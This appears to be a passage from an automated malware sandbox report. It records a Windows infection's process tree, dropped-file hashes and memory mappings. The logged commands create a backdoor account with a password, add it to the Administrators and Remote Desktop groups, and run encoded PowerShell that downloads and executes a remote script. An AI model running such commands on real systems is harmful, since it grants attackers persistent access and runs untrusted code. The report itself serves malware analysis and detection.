- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 3JUsl8wO /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 3JUsl8wO /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 3JUsl8wO1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 3JUsl8wO2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 3JUsl8wO3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7904.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\7904.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\98A3.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\98A3.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\D4A3.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\D4A3.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\RESEA5C.tmpMD5
1c3a7066232068a375659d7668e1c2ec
SHA1809c169fcb9462ede636e0db4f7601e121936dc5
SHA2563ff5c4005bab5a1a1e227ae902a9b4337106b7ac5220f7b8d0e149330ce3f1db
SHA51205b4c2b3c1771cad3f282c4701c0b759c4c9827166fbc08085fd53eb37622079df89604b378a20bae746662c58a4c18decfd01c086c2e34ce7b3e98e311f6b11
-
C:\Users\Admin\AppData\Local\Temp\RESF009.tmpMD5
4e01daab7da628ae319618a743c2651d
SHA1580c979a3ccb5cc33d30324304b41772f39b484f
SHA2562ae332614251498da9aa12a413930b21b8b2be01683f6ef67d1b77a0f9cab582
SHA512caf5382ca6e166c8bfd689f88d8bda9e21607be95003ef0acc3f6a987dc800ee42ebf191c183bf6798bf1789299e956cde2418d3c15bf9421edf5c98b511abca
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\jebw35gm\jebw35gm.dllMD5
bce5daf30adec4408206e43cd4cd47f8
SHA1f7192fe1c28f2b3b8c38d89501291686d865a642
SHA256cc1b71cc4f6fe0f93f1eb9e66615e37f1de1a2878dc43137b5db7b9f6c674d01
SHA51231a4134dfb9f39d0b39aa8d59295a1f6f439edc2d318f5f3ed99c32ae8632db625c2722f88af991caa14a97d4d0bc2302c0266886e16762184fa25ae5becce7a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\uhjglvzx\uhjglvzx.dllMD5
12056fea55c7c675e71d7e5112a3ede5
SHA12aaee10852f63a99faeef1bc720693dd4f98acce
SHA2566788d02326125b47c3b5b2f4f530cd355a435548ba8175128fd607ed29a8e449
SHA512edbea35f6148325f74da4a45dd6f183bdfce322c66f060a800cb15e3f8cb67ff3500751fb7d4a6d5a47b6de0b59662a0fe0aa2cf09a7726615da8a29c15760cd
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\jebw35gm\CSCA34C6D16E06431187B19D3288333D34.TMPMD5
7bd8853c49a3254c1223a35afbd9f17b
SHA108dc175627010fac446a100096a590278702b511
SHA25611362b06e227f53e6899724bcf176624a3fbb6c69eefa0537a4601c32ca0a828
SHA512ec4058b7737714a7a3bc6b08cf654433d057bb8ce1b86c8149e0948b3058da8dabd55fe7305f3e2d3abb1d5d18827e8e833eb21e139a3b8779897f81ce0cdca7
-
\??\c:\Users\Admin\AppData\Local\Temp\jebw35gm\jebw35gm.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\jebw35gm\jebw35gm.cmdlineMD5
5ffb60235ed840effa83888b5f840bbe
SHA178128a686fc260e850b6cf7c6395438d3a029203
SHA2560533695d71e1c286ccdaa688ecc8e00e6d3d3e5b3dc17c5daf26615693ce0047
SHA512b5fcf4a486bc14fbc5ae9b106dcdc70945ff640d77e7889812e125d5634568abe524ac8fa5d1b1e253d3cda813753389c110973ed4964d5cdcc99ff4aae69851
-
\??\c:\Users\Admin\AppData\Local\Temp\uhjglvzx\CSC3ECE22E97D764CCA9FFEF0369F48FCA0.TMPMD5
cfdcc24da856770403a62ed67dcc9b74
SHA11c40741d85c1aff238b20e291b10b828e39ac18d
SHA256aab664055b2d51b6aed69a1fa7885e7e30646085fe456a124b40bb1e9bc713cb
SHA5128403023d303572ff513330ce254570d7780a92bdae7bc2c4836342e358c6ab703aa30775035dbebd4b7d84dad74a0a690135fe186c90651acfe649873ea8874e
-
\??\c:\Users\Admin\AppData\Local\Temp\uhjglvzx\uhjglvzx.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\uhjglvzx\uhjglvzx.cmdlineMD5
8dec72251191b090e4ab589dc173f739
SHA1f3b39b3b9b4470df5e31b427961348ba39224606
SHA256cc29209558020a5930b450be14f81055ab3b75a82e211fd3064d34862999be07
SHA5121dd1ef2463d30bcc2b037220da8bde9becf500598d32a406d6c7f2316047566c8d007c90292eec74215d6c000b02e1e60ad60a0eb66a7e7d6dc89761fc7e8be2
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/348-413-0x0000000000000000-mapping.dmp
-
memory/352-183-0x0000000000000000-mapping.dmp
-
memory/796-410-0x0000000000000000-mapping.dmp
-
memory/896-420-0x0000000000000000-mapping.dmp
-
memory/1228-134-0x00000000005C0000-0x00000000005C1000-memory.dmpFilesize
4KB
-
memory/1228-130-0x0000000000000000-mapping.dmp
-
memory/1228-149-0x000000006FE80000-0x000000006FECB000-memory.dmpFilesize
300KB
-
memory/1228-146-0x0000000073A40000-0x0000000073FC4000-memory.dmpFilesize
5.5MB
-
memory/1228-145-0x0000000002C20000-0x0000000002C21000-memory.dmpFilesize
4KB
-
memory/1228-139-0x0000000071C30000-0x0000000071CB0000-memory.dmpFilesize
512KB
-
memory/1228-144-0x0000000001190000-0x00000000011D5000-memory.dmpFilesize
276KB
-
memory/1228-137-0x0000000001210000-0x0000000001211000-memory.dmpFilesize
4KB
-
memory/1228-136-0x0000000076640000-0x0000000076731000-memory.dmpFilesize
964KB
-
memory/1228-135-0x0000000076830000-0x00000000769F2000-memory.dmpFilesize
1.8MB
-
memory/1228-133-0x0000000001210000-0x000000000127C000-memory.dmpFilesize
432KB
-
memory/1228-147-0x0000000074BE0000-0x0000000075F28000-memory.dmpFilesize
19.3MB
-
memory/1236-411-0x0000000000000000-mapping.dmp
-
memory/1324-430-0x0000000000000000-mapping.dmp
-
memory/1480-425-0x0000000000000000-mapping.dmp
-
memory/1672-426-0x0000000000000000-mapping.dmp
-
memory/1672-365-0x0000000000000000-mapping.dmp
-
memory/1812-415-0x0000000000000000-mapping.dmp
-
memory/1852-367-0x0000000000000000-mapping.dmp
-
memory/1896-416-0x0000000000000000-mapping.dmp
-
memory/1904-409-0x0000000000000000-mapping.dmp
-
memory/1908-431-0x0000000000000000-mapping.dmp
-
memory/2080-171-0x000001DE1EAE3000-0x000001DE1EAE5000-memory.dmpFilesize
8KB
-
memory/2080-163-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-172-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-169-0x000001DE3B3B0000-0x000001DE3B3B1000-memory.dmpFilesize
4KB
-
memory/2080-179-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-205-0x000001DE3BDC0000-0x000001DE3BDC1000-memory.dmpFilesize
4KB
-
memory/2080-168-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-167-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-166-0x000001DE3B200000-0x000001DE3B201000-memory.dmpFilesize
4KB
-
memory/2080-201-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-165-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-164-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-187-0x000001DE3B360000-0x000001DE3B361000-memory.dmpFilesize
4KB
-
memory/2080-170-0x000001DE1EAE0000-0x000001DE1EAE2000-memory.dmpFilesize
8KB
-
memory/2080-189-0x000001DE1EAE6000-0x000001DE1EAE8000-memory.dmpFilesize
8KB
-
memory/2080-204-0x000001DE3BA30000-0x000001DE3BA31000-memory.dmpFilesize
4KB
-
memory/2080-162-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-161-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-202-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-160-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-159-0x0000000000000000-mapping.dmp
-
memory/2080-206-0x000001DE1EAE8000-0x000001DE1EAE9000-memory.dmpFilesize
4KB
-
memory/2080-197-0x000001DE3B3A0000-0x000001DE3B3A1000-memory.dmpFilesize
4KB
-
memory/2080-198-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2080-199-0x000001DE1EAA0000-0x000001DE1EAA2000-memory.dmpFilesize
8KB
-
memory/2144-404-0x0000000000000000-mapping.dmp
-
memory/2204-193-0x0000000000000000-mapping.dmp
-
memory/2204-421-0x0000000000000000-mapping.dmp
-
memory/2272-158-0x0000019FEC376000-0x0000019FEC377000-memory.dmpFilesize
4KB
-
memory/2272-157-0x0000019FEC375000-0x0000019FEC376000-memory.dmpFilesize
4KB
-
memory/2272-155-0x0000019FEC370000-0x0000019FEC372000-memory.dmpFilesize
8KB
-
memory/2272-153-0x0000019FECF10000-0x0000019FED1DF000-memory.dmpFilesize
2.8MB
-
memory/2272-150-0x0000000000000000-mapping.dmp
-
memory/2272-156-0x0000019FEC373000-0x0000019FEC375000-memory.dmpFilesize
8KB
-
memory/2356-190-0x0000000000000000-mapping.dmp
-
memory/2396-528-0x0000000000000000-mapping.dmp
-
memory/2512-419-0x0000000000000000-mapping.dmp
-
memory/2680-366-0x0000000000000000-mapping.dmp
-
memory/2752-405-0x0000000000000000-mapping.dmp
-
memory/2820-304-0x000002AEEA8C3000-0x000002AEEA8C5000-memory.dmpFilesize
8KB
-
memory/2820-256-0x0000000000000000-mapping.dmp
-
memory/2820-303-0x000002AEEA8C0000-0x000002AEEA8C2000-memory.dmpFilesize
8KB
-
memory/2820-307-0x000002AEEA8C6000-0x000002AEEA8C8000-memory.dmpFilesize
8KB
-
memory/2932-432-0x0000000000000000-mapping.dmp
-
memory/2936-412-0x0000000000000000-mapping.dmp
-
memory/3040-118-0x0000000000DB0000-0x0000000000DC6000-memory.dmpFilesize
88KB
-
memory/3076-414-0x0000000000000000-mapping.dmp
-
memory/3108-422-0x0000000000000000-mapping.dmp
-
memory/3140-428-0x0000000000000000-mapping.dmp
-
memory/3184-434-0x0000000000000000-mapping.dmp
-
memory/3196-529-0x0000000000000000-mapping.dmp
-
memory/3280-423-0x0000000000000000-mapping.dmp
-
memory/3340-119-0x0000000000000000-mapping.dmp
-
memory/3340-128-0x00000000057A0000-0x00000000057A1000-memory.dmpFilesize
4KB
-
memory/3340-122-0x0000000000EC0000-0x0000000000EC1000-memory.dmpFilesize
4KB
-
memory/3340-124-0x0000000005D00000-0x0000000005D01000-memory.dmpFilesize
4KB
-
memory/3340-125-0x0000000003370000-0x0000000003371000-memory.dmpFilesize
4KB
-
memory/3340-126-0x0000000005800000-0x0000000005801000-memory.dmpFilesize
4KB
-
memory/3340-127-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/3340-129-0x00000000056F0000-0x0000000005CF6000-memory.dmpFilesize
6.0MB
-
memory/3456-348-0x00000166BA850000-0x00000166BA852000-memory.dmpFilesize
8KB
-
memory/3456-301-0x0000000000000000-mapping.dmp
-
memory/3456-352-0x00000166BA856000-0x00000166BA858000-memory.dmpFilesize
8KB
-
memory/3456-354-0x00000166BA858000-0x00000166BA85A000-memory.dmpFilesize
8KB
-
memory/3456-350-0x00000166BA853000-0x00000166BA855000-memory.dmpFilesize
8KB
-
memory/3528-427-0x0000000000000000-mapping.dmp
-
memory/3672-506-0x0000021D64688000-0x0000021D64689000-memory.dmpFilesize
4KB
-
memory/3672-456-0x0000021D64686000-0x0000021D64688000-memory.dmpFilesize
8KB
-
memory/3672-447-0x0000021D64683000-0x0000021D64685000-memory.dmpFilesize
8KB
-
memory/3672-446-0x0000021D64680000-0x0000021D64682000-memory.dmpFilesize
8KB
-
memory/3672-435-0x0000000000000000-mapping.dmp
-
memory/3788-180-0x0000000000000000-mapping.dmp
-
memory/3920-115-0x0000000000030000-0x0000000000038000-memory.dmpFilesize
32KB
-
memory/3920-117-0x0000000000400000-0x0000000000828000-memory.dmpFilesize
4.2MB
-
memory/3920-424-0x0000000000000000-mapping.dmp
-
memory/3920-116-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/3928-433-0x0000000000000000-mapping.dmp
-
memory/4080-216-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-215-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-218-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-214-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-217-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-219-0x0000014D6F160000-0x0000014D6F162000-memory.dmpFilesize
8KB
-
memory/4080-225-0x0000014D70FC3000-0x0000014D70FC5000-memory.dmpFilesize
8KB
-
memory/4080-224-0x0000014D70FC0000-0x0000014D70FC2000-memory.dmpFilesize
8KB
-
memory/4080-261-0x0000014D70FC6000-0x0000014D70FC8000-memory.dmpFilesize
8KB
-
memory/4080-213-0x0000000000000000-mapping.dmp
-
memory/4080-263-0x0000014D70FC8000-0x0000014D70FCA000-memory.dmpFilesize
8KB